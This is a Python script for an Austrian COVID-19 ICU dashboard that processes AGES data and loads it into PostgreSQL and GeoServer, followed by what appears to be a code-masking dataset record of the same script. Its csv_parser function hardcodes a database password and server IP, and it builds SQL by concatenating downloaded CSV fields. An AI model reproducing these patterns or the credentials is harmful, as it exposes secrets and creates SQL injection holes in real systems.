"Salzburg": np.asarray(df.loc[df["Bundesland"] == "Salzburg"]["FZICU"]),
"Steiermark": np.asarray(df.loc[df['Bundesland'] == "Steiermark"]["FZICU"]),
"Tirol": np.asarray(df.loc[df["Bundesland"] == "Tirol"]["FZICU"]),
"Vorarlberg": np.asarray(df.loc[df['Bundesland'] == "Vorarlberg"]["FZICU"]),
"Wien": np.asarray(df.loc[df["Bundesland"] == "Wien"]["FZICU"]),
})
df_FZICU.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl")
df_ICU_cap = pd.DataFrame({
"MeldeDatum": np.asarray(df.loc[df['Bundesland'] == "Alle"]["MeldeDatum"]),
"Alle": np.asarray(df.loc[df['Bundesland'] == "Alle"]["ICU_capacity"]),
"Burgenland": np.asarray(df.loc[df["Bundesland"] == "Burgenland"]["ICU_capacity"]),
"Kärnten": np.asarray(df.loc[df['Bundesland'] == "Kärnten"]["ICU_capacity"]),
"Niederösterreich": np.asarray(df.loc[df["Bundesland"] == "Niederösterreich"]["ICU_capacity"]),
"Oberösterreich": np.asarray(df.loc[df['Bundesland'] == "Oberösterreich"]["ICU_capacity"]),
"Salzburg": np.asarray(df.loc[df["Bundesland"] == "Salzburg"]["ICU_capacity"]),
"Steiermark": np.asarray(df.loc[df['Bundesland'] == "Steiermark"]["ICU_capacity"]),
"Tirol": np.asarray(df.loc[df["Bundesland"] == "Tirol"]["ICU_capacity"]),
"Vorarlberg": np.asarray(df.loc[df['Bundesland'] == "Vorarlberg"]["ICU_capacity"]),
"Wien": np.asarray(df.loc[df["Bundesland"] == "Wien"]["ICU_capacity"]),
})
df_ICU_cap.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl")
# Writing to logfile
file_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')
now = datetime.now() # current date and time
date_time = now.strftime("%m/%d/%Y, %H:%M:%S")
file_object.write('Success: '+date_time+"\n")
file_object.close()
"""
DB CONNECTOR
"""
# DB create string from csv for COVID data
import csv
with open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:
instr = ""
reader = csv.reader(f,delimiter=";")
#print(reader)
next(reader) # Skip the header row.
for row in reader:
instr=instr+("INSERT INTO icu_data VALUES ('"+str(row[0])+"','"+str(row[1])+"','"+str(row[2])+"','"+str(row[3])+"','"+str(row[4])+"','"+str(row[5])+"','"+str(row[6])+"','"+str(row[7])+"','"+str(row[8])+"');" )
# DB create string from csv for MAP data
import csv
import sys
csv.field_size_limit(sys.maxsize)
with open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:
instr_map = ""
reader = csv.reader(f,delimiter=",")
#print(reader)
next(reader) # Skip the header row.
for row in reader:
instr_map=instr_map+("INSERT INTO icu_map VALUES ('"+str(row[0])+"','"+str(row[1])+"','"+str(row[2])+"','"+str(row[3])+"','"+str(row[4])+"','"+str(row[5])+"','"+str(row[6])+"','"+str(row[7])+"','"+str(row[8])+"','"+str(row[9])+"','"+str(row[10])+"');" )
""" connecting to DB, parsing SQL statements """
def csv_parser(statement):
import psycopg2
return_ls = []
try:
connection = psycopg2.connect(user="icu_bot",
password="5B2xwP8h4Ln4Y8Xs",
host="85.214.150.208",
port="5432",
database="ICU")
cursor = connection.cursor()
sql_Query = statement
#print(sql_Query)
cursor.execute(sql_Query)
connection.commit()
#print("Selecting rows from mobile table using cursor.fetchall")
#mobile_records = cursor.fetchall()
#print("Print each row and it's columns values")
#for row in mobile_records:
# return_ls.append(list(row))
except (Exception, psycopg2.Error) as error :
print ("Error while fetching data from PostgreSQL: ", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
#print("PostgreSQL connection is closed")
return return_ls
# update database in postgis
csv_parser("DELETE FROM icu_data")
csv_parser(instr)
# Update map data in server
csv_parser("DELETE FROM icu_map")
csv_parser(instr_map)
"""
GeoServer Connector
"""
try:
df_geojson = pd.read_json("https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson")
df_geojson.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl")
except:
print("an exception occured connecting to the geoserver")
|
normal
|
{
"blob_id": "516ea681a55255e4c98e7106393180f9ad2e0250",
"index": 8455,
"step-1": "<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\n<mask token>\n",
"step-2": "<mask token>\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', sep=';', index=\n False)\n<mask token>\nfor i in df['MeldeDatum']:\n i = i.replace('.', '')\n i = i.replace(':', '')\n timestamps.append(dt.datetime.strptime(i, '%d%m%Y %H%M%S'))\n<mask token>\nfor a, b in zip(df['FZHosp'], df['FZICU']):\n l_temp.append(a + b)\n<mask token>\nfor a, b in zip(df['FZICU'], df['FZICUFree']):\n l_temp.append(a + b)\n<mask token>\nfor a, b in zip(df['FZICU'], df['ICU_capacity']):\n try:\n l_temp.append(100.0 * float(a) / float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\n<mask token>\nfor i in states:\n temp = df[df['Bundesland'] == i]\n ls_df.append(temp)\n<mask token>\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/ICU_data.csv')\n<mask token>\ndf2.to_pickle('/var/www/FlaskApp/FlaskApp/data/df2.pkl')\n<mask token>\ndf_map.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_map.pkl')\ndf_map.drop(['BundeslandID', 'GID_0', 'NAME_0', 'NAME_1', 'GID_1',\n 'VARNAME_1', 'NL_NAME_1', 'TYPE_1', 'ENGTYPE_1', 'CC_1', 'HASC_1',\n 'test_value'], axis=1).to_csv('/var/www/FlaskApp/FlaskApp/data/df_map.csv',\n index=False)\n<mask token>\ndf_perc.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_perc.pkl')\n<mask token>\ndf_FZICU.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl')\n<mask token>\ndf_ICU_cap.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl')\n<mask token>\nfile_object.write('Success: ' + date_time + '\\n')\nfile_object.close()\n<mask token>\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = ''\n reader = csv.reader(f, delimiter=';')\n next(reader)\n for row in reader:\n instr = instr + (\"INSERT INTO icu_data VALUES ('\" + str(row[0]) +\n \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(row[3]) +\n \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" + str(row[6]) +\n \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"');\")\n<mask token>\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = ''\n reader = csv.reader(f, delimiter=',')\n next(reader)\n for row in reader:\n instr_map = instr_map + (\"INSERT INTO icu_map VALUES ('\" + str(row[\n 0]) + \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(\n row[3]) + \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" +\n str(row[6]) + \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"','\" +\n str(row[9]) + \"','\" + str(row[10]) + \"');\")\n<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\ncsv_parser('DELETE FROM icu_data')\ncsv_parser(instr)\ncsv_parser('DELETE FROM icu_map')\ncsv_parser(instr_map)\n<mask token>\ntry:\n df_geojson = pd.read_json(\n 'https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson'\n )\n df_geojson.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl')\nexcept:\n print('an exception occured connecting to the geoserver')\n",
"step-3": "url = 'https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv'\n<mask token>\ndf = pd.read_csv(url, sep=';')\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', sep=';', index=\n False)\n<mask token>\ntimestamps = []\nfor i in df['MeldeDatum']:\n i = i.replace('.', '')\n i = i.replace(':', '')\n timestamps.append(dt.datetime.strptime(i, '%d%m%Y %H%M%S'))\ndf['MeldeDatum'] = timestamps\ndf = df.drop(['Meldedat'], axis=1)\nstates = list(df['Bundesland'].unique())\nl_temp = []\nfor a, b in zip(df['FZHosp'], df['FZICU']):\n l_temp.append(a + b)\ndf['Hospitalizations_total'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['FZICUFree']):\n l_temp.append(a + b)\ndf['ICU_capacity'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['ICU_capacity']):\n try:\n l_temp.append(100.0 * float(a) / float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\ndf['ICU_perc'] = l_temp\nls_df = []\nfor i in states:\n temp = df[df['Bundesland'] == i]\n ls_df.append(temp)\nadm1 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp')\nadm0 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp')\ndf = df.round(1)\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/ICU_data.csv')\nmost_recent_date = df['MeldeDatum'].max()\ndf2 = df.loc[df['MeldeDatum'] == most_recent_date]\ndf2.to_pickle('/var/www/FlaskApp/FlaskApp/data/df2.pkl')\ndf_map = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson')\ndf_map['Bundesland'] = df_map['NAME_1']\ndf_map = pd.merge(df2, df_map, on='Bundesland')\ndf_map = gpd.GeoDataFrame(df_map, geometry='geometry')\ndf_map.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_map.pkl')\ndf_map.drop(['BundeslandID', 'GID_0', 'NAME_0', 'NAME_1', 'GID_1',\n 'VARNAME_1', 'NL_NAME_1', 'TYPE_1', 'ENGTYPE_1', 'CC_1', 'HASC_1',\n 'test_value'], axis=1).to_csv('/var/www/FlaskApp/FlaskApp/data/df_map.csv',\n index=False)\n<mask token>\ndf_perc = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_perc']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['ICU_perc']), 'Kärnten': np.asarray(df.loc[df[\n 'Bundesland'] == 'Kärnten']['ICU_perc']), 'Niederösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Niederösterreich']['ICU_perc']),\n 'Oberösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Oberösterreich']['ICU_perc']), 'Salzburg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Salzburg']['ICU_perc']), 'Steiermark': np.asarray(df.\n loc[df['Bundesland'] == 'Steiermark']['ICU_perc']), 'Tirol': np.asarray\n (df.loc[df['Bundesland'] == 'Tirol']['ICU_perc']), 'Vorarlberg': np.\n asarray(df.loc[df['Bundesland'] == 'Vorarlberg']['ICU_perc']), 'Wien':\n np.asarray(df.loc[df['Bundesland'] == 'Wien']['ICU_perc'])})\ndf_perc.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_perc.pkl')\ndf_FZICU = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['FZICU']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['FZICU']), 'Kärnten': np.asarray(df.loc[df['Bundesland'] ==\n 'Kärnten']['FZICU']), 'Niederösterreich': np.asarray(df.loc[df[\n 'Bundesland'] == 'Niederösterreich']['FZICU']), 'Oberösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Oberösterreich']['FZICU']),\n 'Salzburg': np.asarray(df.loc[df['Bundesland'] == 'Salzburg']['FZICU']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'FZICU']), 'Tirol': 
np.asarray(df.loc[df['Bundesland'] == 'Tirol'][\n 'FZICU']), 'Vorarlberg': np.asarray(df.loc[df['Bundesland'] ==\n 'Vorarlberg']['FZICU']), 'Wien': np.asarray(df.loc[df['Bundesland'] ==\n 'Wien']['FZICU'])})\ndf_FZICU.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl')\ndf_ICU_cap = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_capacity']), 'Burgenland': np.asarray(df.loc[df[\n 'Bundesland'] == 'Burgenland']['ICU_capacity']), 'Kärnten': np.asarray(\n df.loc[df['Bundesland'] == 'Kärnten']['ICU_capacity']),\n 'Niederösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Niederösterreich']['ICU_capacity']), 'Oberösterreich': np.asarray(df.\n loc[df['Bundesland'] == 'Oberösterreich']['ICU_capacity']), 'Salzburg':\n np.asarray(df.loc[df['Bundesland'] == 'Salzburg']['ICU_capacity']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'ICU_capacity']), 'Tirol': np.asarray(df.loc[df['Bundesland'] ==\n 'Tirol']['ICU_capacity']), 'Vorarlberg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Vorarlberg']['ICU_capacity']), 'Wien': np.asarray(df.\n loc[df['Bundesland'] == 'Wien']['ICU_capacity'])})\ndf_ICU_cap.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl')\nfile_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')\nnow = datetime.now()\ndate_time = now.strftime('%m/%d/%Y, %H:%M:%S')\nfile_object.write('Success: ' + date_time + '\\n')\nfile_object.close()\n<mask token>\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = ''\n reader = csv.reader(f, delimiter=';')\n next(reader)\n for row in reader:\n instr = instr + (\"INSERT INTO icu_data VALUES ('\" + str(row[0]) +\n \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(row[3]) +\n \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" + str(row[6]) +\n \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"');\")\n<mask token>\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = ''\n reader = csv.reader(f, delimiter=',')\n next(reader)\n for row in reader:\n instr_map = instr_map + (\"INSERT INTO icu_map VALUES ('\" + str(row[\n 0]) + \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(\n row[3]) + \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" +\n str(row[6]) + \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"','\" +\n str(row[9]) + \"','\" + str(row[10]) + \"');\")\n<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\ncsv_parser('DELETE FROM icu_data')\ncsv_parser(instr)\ncsv_parser('DELETE FROM icu_map')\ncsv_parser(instr_map)\n<mask token>\ntry:\n df_geojson = pd.read_json(\n 'https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson'\n )\n df_geojson.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl')\nexcept:\n print('an exception occured connecting to the geoserver')\n",
"step-4": "url = 'https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv'\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\ndf = pd.read_csv(url, sep=';')\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', sep=';', index=\n False)\nimport datetime as dt\nfrom datetime import datetime\nimport time\ntimestamps = []\nfor i in df['MeldeDatum']:\n i = i.replace('.', '')\n i = i.replace(':', '')\n timestamps.append(dt.datetime.strptime(i, '%d%m%Y %H%M%S'))\ndf['MeldeDatum'] = timestamps\ndf = df.drop(['Meldedat'], axis=1)\nstates = list(df['Bundesland'].unique())\nl_temp = []\nfor a, b in zip(df['FZHosp'], df['FZICU']):\n l_temp.append(a + b)\ndf['Hospitalizations_total'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['FZICUFree']):\n l_temp.append(a + b)\ndf['ICU_capacity'] = l_temp\nl_temp = []\nfor a, b in zip(df['FZICU'], df['ICU_capacity']):\n try:\n l_temp.append(100.0 * float(a) / float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\ndf['ICU_perc'] = l_temp\nls_df = []\nfor i in states:\n temp = df[df['Bundesland'] == i]\n ls_df.append(temp)\nadm1 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp')\nadm0 = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp')\ndf = df.round(1)\ndf.to_csv('/var/www/FlaskApp/FlaskApp/data/ICU_data.csv')\nmost_recent_date = df['MeldeDatum'].max()\ndf2 = df.loc[df['MeldeDatum'] == most_recent_date]\ndf2.to_pickle('/var/www/FlaskApp/FlaskApp/data/df2.pkl')\ndf_map = gpd.read_file('/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson')\ndf_map['Bundesland'] = df_map['NAME_1']\ndf_map = pd.merge(df2, df_map, on='Bundesland')\ndf_map = gpd.GeoDataFrame(df_map, geometry='geometry')\ndf_map.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_map.pkl')\ndf_map.drop(['BundeslandID', 'GID_0', 'NAME_0', 'NAME_1', 'GID_1',\n 'VARNAME_1', 'NL_NAME_1', 'TYPE_1', 'ENGTYPE_1', 'CC_1', 'HASC_1',\n 'test_value'], axis=1).to_csv('/var/www/FlaskApp/FlaskApp/data/df_map.csv',\n index=False)\n<mask token>\ndf_perc = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_perc']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['ICU_perc']), 'Kärnten': np.asarray(df.loc[df[\n 'Bundesland'] == 'Kärnten']['ICU_perc']), 'Niederösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Niederösterreich']['ICU_perc']),\n 'Oberösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Oberösterreich']['ICU_perc']), 'Salzburg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Salzburg']['ICU_perc']), 'Steiermark': np.asarray(df.\n loc[df['Bundesland'] == 'Steiermark']['ICU_perc']), 'Tirol': np.asarray\n (df.loc[df['Bundesland'] == 'Tirol']['ICU_perc']), 'Vorarlberg': np.\n asarray(df.loc[df['Bundesland'] == 'Vorarlberg']['ICU_perc']), 'Wien':\n np.asarray(df.loc[df['Bundesland'] == 'Wien']['ICU_perc'])})\ndf_perc.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_perc.pkl')\ndf_FZICU = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['FZICU']), 'Burgenland': np.asarray(df.loc[df['Bundesland'] ==\n 'Burgenland']['FZICU']), 'Kärnten': np.asarray(df.loc[df['Bundesland'] ==\n 'Kärnten']['FZICU']), 'Niederösterreich': np.asarray(df.loc[df[\n 'Bundesland'] == 'Niederösterreich']['FZICU']), 'Oberösterreich': np.\n asarray(df.loc[df['Bundesland'] == 'Oberösterreich']['FZICU']),\n 'Salzburg': np.asarray(df.loc[df['Bundesland'] == 
'Salzburg']['FZICU']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'FZICU']), 'Tirol': np.asarray(df.loc[df['Bundesland'] == 'Tirol'][\n 'FZICU']), 'Vorarlberg': np.asarray(df.loc[df['Bundesland'] ==\n 'Vorarlberg']['FZICU']), 'Wien': np.asarray(df.loc[df['Bundesland'] ==\n 'Wien']['FZICU'])})\ndf_FZICU.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl')\ndf_ICU_cap = pd.DataFrame({'MeldeDatum': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['MeldeDatum']), 'Alle': np.asarray(df.loc[df['Bundesland'] ==\n 'Alle']['ICU_capacity']), 'Burgenland': np.asarray(df.loc[df[\n 'Bundesland'] == 'Burgenland']['ICU_capacity']), 'Kärnten': np.asarray(\n df.loc[df['Bundesland'] == 'Kärnten']['ICU_capacity']),\n 'Niederösterreich': np.asarray(df.loc[df['Bundesland'] ==\n 'Niederösterreich']['ICU_capacity']), 'Oberösterreich': np.asarray(df.\n loc[df['Bundesland'] == 'Oberösterreich']['ICU_capacity']), 'Salzburg':\n np.asarray(df.loc[df['Bundesland'] == 'Salzburg']['ICU_capacity']),\n 'Steiermark': np.asarray(df.loc[df['Bundesland'] == 'Steiermark'][\n 'ICU_capacity']), 'Tirol': np.asarray(df.loc[df['Bundesland'] ==\n 'Tirol']['ICU_capacity']), 'Vorarlberg': np.asarray(df.loc[df[\n 'Bundesland'] == 'Vorarlberg']['ICU_capacity']), 'Wien': np.asarray(df.\n loc[df['Bundesland'] == 'Wien']['ICU_capacity'])})\ndf_ICU_cap.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl')\nfile_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')\nnow = datetime.now()\ndate_time = now.strftime('%m/%d/%Y, %H:%M:%S')\nfile_object.write('Success: ' + date_time + '\\n')\nfile_object.close()\n<mask token>\nimport csv\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = ''\n reader = csv.reader(f, delimiter=';')\n next(reader)\n for row in reader:\n instr = instr + (\"INSERT INTO icu_data VALUES ('\" + str(row[0]) +\n \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(row[3]) +\n \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" + str(row[6]) +\n \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"');\")\nimport csv\nimport sys\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = ''\n reader = csv.reader(f, delimiter=',')\n next(reader)\n for row in reader:\n instr_map = instr_map + (\"INSERT INTO icu_map VALUES ('\" + str(row[\n 0]) + \"','\" + str(row[1]) + \"','\" + str(row[2]) + \"','\" + str(\n row[3]) + \"','\" + str(row[4]) + \"','\" + str(row[5]) + \"','\" +\n str(row[6]) + \"','\" + str(row[7]) + \"','\" + str(row[8]) + \"','\" +\n str(row[9]) + \"','\" + str(row[10]) + \"');\")\n<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\ncsv_parser('DELETE FROM icu_data')\ncsv_parser(instr)\ncsv_parser('DELETE FROM icu_map')\ncsv_parser(instr_map)\n<mask token>\ntry:\n df_geojson = pd.read_json(\n 'https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson'\n )\n 
df_geojson.to_pickle('/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl')\nexcept:\n print('an exception occured connecting to the geoserver')\n",
"step-5": "# csv URL\nurl = \"https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv\"\n\n# read csv from URL\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\ndf=pd.read_csv(url,sep=\";\")\ndf.to_csv(\"/var/www/FlaskApp/FlaskApp/data/covid_data.csv\",sep=\";\",index=False)\n\n# transforming timestamps to proper DateTime format\nimport datetime as dt\nfrom datetime import datetime\nimport time\ntimestamps = []\nfor i in df[\"MeldeDatum\"]:\n i = i.replace(\".\",\"\")\n i = i.replace(\":\",\"\")\n timestamps.append(dt.datetime.strptime(i, \"%d%m%Y %H%M%S\"))\ndf[\"MeldeDatum\"] = timestamps\ndf = df.drop([\"Meldedat\"], axis=1)\n\n# get List of State Names\nstates = list(df[\"Bundesland\"].unique())\n\n# append total hospitalizations to DF\nl_temp = []\nfor a,b in zip(df[\"FZHosp\"],df[\"FZICU\"]):\n l_temp.append(a+b)\ndf[\"Hospitalizations_total\"] = l_temp\n\n# append total ICU capacity to DF\nl_temp = []\nfor a,b in zip(df[\"FZICU\"],df[\"FZICUFree\"]):\n l_temp.append(a+b)\ndf[\"ICU_capacity\"] = l_temp\n\n# append ICU occupancy percentages to DF\nl_temp = []\nfor a,b in zip(df[\"FZICU\"],df[\"ICU_capacity\"]):\n try:\n l_temp.append(100.0 * float(a)/float(b))\n except ZeroDivisionError:\n l_temp.append(0.0)\ndf[\"ICU_perc\"] = l_temp\n\n# create list of dataframes by Bundesland\nls_df = []\nfor i in states:\n temp = df[df[\"Bundesland\"]==i]\n ls_df.append(temp)\n \n# importing adm0 and adm1 shapefilesas geopandas dataframes\nadm1 = gpd.read_file(\"/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp\")\nadm0 = gpd.read_file(\"/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp\")\n\n#writing to json\n#adm1.to_file(\"data/austria_adm1.geojson\", driver=\"GeoJSON\")\n#adm0.to_file(\"data/austria_adm0.geojson\", driver=\"GeoJSON\") \n\n# save CSV after manipulating & rounding\ndf = df.round(1)\ndf.to_csv(\"/var/www/FlaskApp/FlaskApp/data/ICU_data.csv\")\n\n# create most recent DF for map\nmost_recent_date = df['MeldeDatum'].max()\ndf2 = df.loc[df['MeldeDatum'] == most_recent_date]\ndf2.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df2.pkl\")\n\n# join geometries with most recent data per state\ndf_map =gpd.read_file(\"/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson\")\ndf_map[\"Bundesland\"] = df_map[\"NAME_1\"]\ndf_map = pd.merge(df2,df_map,on=\"Bundesland\")\ndf_map = gpd.GeoDataFrame(df_map, geometry=\"geometry\")\ndf_map.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_map.pkl\")\n# drop unused columns and save file in data folder\ndf_map.drop([\"BundeslandID\",\"GID_0\",\"NAME_0\",\"NAME_1\",\"GID_1\",\"VARNAME_1\",\"NL_NAME_1\",\"TYPE_1\",\"ENGTYPE_1\",\"CC_1\",\"HASC_1\",\"test_value\"],axis=1).to_csv(\"/var/www/FlaskApp/FlaskApp/data/df_map.csv\",index=False)\n\n\n\"\"\"\nCREATE DFs FOR UPDATE GRAPHS\n\"\"\"\ndf_perc = pd.DataFrame({\n \"MeldeDatum\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"MeldeDatum\"]),\n \"Alle\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"ICU_perc\"]),\n \"Burgenland\": np.asarray(df.loc[df[\"Bundesland\"] == \"Burgenland\"][\"ICU_perc\"]),\n \"Kärnten\": np.asarray(df.loc[df['Bundesland'] == \"Kärnten\"][\"ICU_perc\"]),\n \"Niederösterreich\": np.asarray(df.loc[df[\"Bundesland\"] == \"Niederösterreich\"][\"ICU_perc\"]),\n \"Oberösterreich\": np.asarray(df.loc[df['Bundesland'] == \"Oberösterreich\"][\"ICU_perc\"]),\n \"Salzburg\": np.asarray(df.loc[df[\"Bundesland\"] == \"Salzburg\"][\"ICU_perc\"]),\n \"Steiermark\": np.asarray(df.loc[df['Bundesland'] == \"Steiermark\"][\"ICU_perc\"]),\n \"Tirol\": 
